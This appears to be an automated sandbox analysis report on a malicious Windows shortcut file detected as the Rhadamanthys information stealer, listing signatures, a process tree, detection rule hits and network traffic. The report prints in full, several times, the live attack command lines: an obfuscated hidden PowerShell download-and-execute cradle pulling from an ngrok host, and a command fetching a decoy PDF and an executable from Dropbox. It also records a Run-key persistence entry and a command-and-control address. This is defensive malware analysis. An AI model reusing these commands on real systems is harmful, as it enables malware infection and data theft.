Windows Analysis Report
qxjDerXRGR.lnk

Overview

General Information

Sample name: qxjDerXRGR.lnk (renamed because original name is a hash value)
Original sample name: 72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269.lnk
Analysis ID: 1572661
MD5: c88f33a90353512ebf86cb42e9e1ed08
SHA1: a99182cf7c27dda2a192598210339eb96f0612a6
SHA256: 72aecd00372e488060a53065258a0eb3b57cdd79db5b2afda0082ffe92ebc269
Tags: Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • cmd.exe (PID: 4296 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5660 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • msedge.exe (PID: 3560 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8496 cmdline: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • msedge.exe (PID: 9040 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)
            • msedge.exe (PID: 9244 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
          • 111392827.exe (PID: 9408 cmdline: "C:\Users\user\AppData\Local\Temp\111392827.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
            • 111392827.exe (PID: 9612 cmdline: "C:\Users\user\AppData\Local\Temp\111392827.exe" MD5: EB40135D3E0FE985A9E09970DC09A499)
              • fontdrvhost.exe (PID: 9640 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)
                • fontdrvhost.exe (PID: 9800 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
                  • WerFault.exe (PID: 9864 cmdline: C:\Windows\system32\WerFault.exe -u -p 9800 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 9720 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6596 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • msedge.exe (PID: 7208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7552 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8300 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8376 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8876 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 9964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
Name: Rhadamanthys
Description: According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
Attribution: Sandworm
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000018.00000003.2631329587.00000000007A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | |
| 00000019.00000003.2641153235.00000000030A0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | |
| 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| 00000019.00000002.2758285950.0000000003360000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | |
| 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 25.3.fontdrvhost.exe.53e0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| 24.3.111392827.exe.2fa0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| 25.3.fontdrvhost.exe.5600000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
| 24.3.111392827.exe.2d80000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |

System Summary

Source: File created, Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5660, TargetFilename: C:\Users\user\AppData\Local\Temp\399226976.bat
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\111392827.exe, ProcessId: 9408, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5660, TargetFilename: C:\Users\user\AppData\Local\Temp\399226976.bat
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1272, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE", ProcessId: 8496, ProcessName: powershell.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4296, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 5660, ProcessName: powershell.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 4296, ProcessName: cmd.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4296, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing), ProcessId: 5660, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6596, ProcessName: svchost.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-10T18:40:20.053674+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49709 | 162.125.65.18 | 443 | TCP |
| 2024-12-10T18:40:35.468136+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49795 | 162.125.65.18 | 443 | TCP |
| 2024-12-10T18:41:06.598167+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 162.213.210.250 | 6499 | 192.168.2.5 | 49891 | TCP |

AV Detection

Source: C:\Users\user\AppData\Local\Temp\111392827.exe, ReversingLabs: Detection: 26%
Source: qxjDerXRGR.lnk, ReversingLabs: Detection: 21%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: qxjDerXRGR.lnk, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 3.125.209.94:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.65.15:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49773 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.125.69.15:443 -> 192.168.2.5:49811 version: TLS 1.2
                    Source: Binary string: wkernel32.pdb source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 22_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,22_2_00411150
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 22_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,22_2_004631F0
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 22_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,22_2_0045A7D0
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 22_2_00462F00 FindFirstFileW,FindClose,22_2_00462F00
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 24_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,24_2_00411150
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 24_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,24_2_004631F0
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 24_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,24_2_0045A7D0
Source: C:\Users\user\AppData\Local\Temp\111392827.exe, Code function: 24_2_00462F00 FindFirstFileW,FindClose,24_2_00462F00
Source: C:\Windows\System32\fontdrvhost.exe, Code function: 4x nop then dec esp,29_2_00000202B2F50511

Networking

Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 162.213.210.250:6499 -> 192.168.2.5:49891
Source: global traffic, TCP traffic: 192.168.2.5:49891 -> 162.213.210.250:6499
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, HTTP traffic: Redirect from: www.dropbox.com to https://uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com/cd/0/get/cgdzz7nrnr2v450qctzug7jzfzzjptshuwjk_9bntk-n3a9qdlp6fao5cfvn4vkm1epxatmh3b3gw9uic3ppivjoa0rt1b_0cr1uwzrnefc69mshlaaccdd4mqbvznfzpglunlw7r_rxs5sb5u1ihlf5/file?dl=1#
Source: Joe Sandbox View, IP Address: 162.125.65.18
Source: Joe Sandbox View, IP Address: 162.125.69.15
Source: Joe Sandbox View, IP Address: 162.159.61.3
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 162.125.65.18:443
